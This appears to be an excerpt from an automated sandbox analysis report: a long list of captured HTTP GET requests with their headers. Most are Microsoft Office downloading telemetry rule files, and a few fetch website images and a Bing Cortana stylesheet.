                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global traffic HTTP traffic detected: GET /rb/3D/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1 host: otelrules.svc.static.microsoft accept-encoding: identity user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1 host: otelrules.svc.static.microsoft accept-encoding: identity user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1 host: otelrules.svc.static.microsoft accept-encoding: identity user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
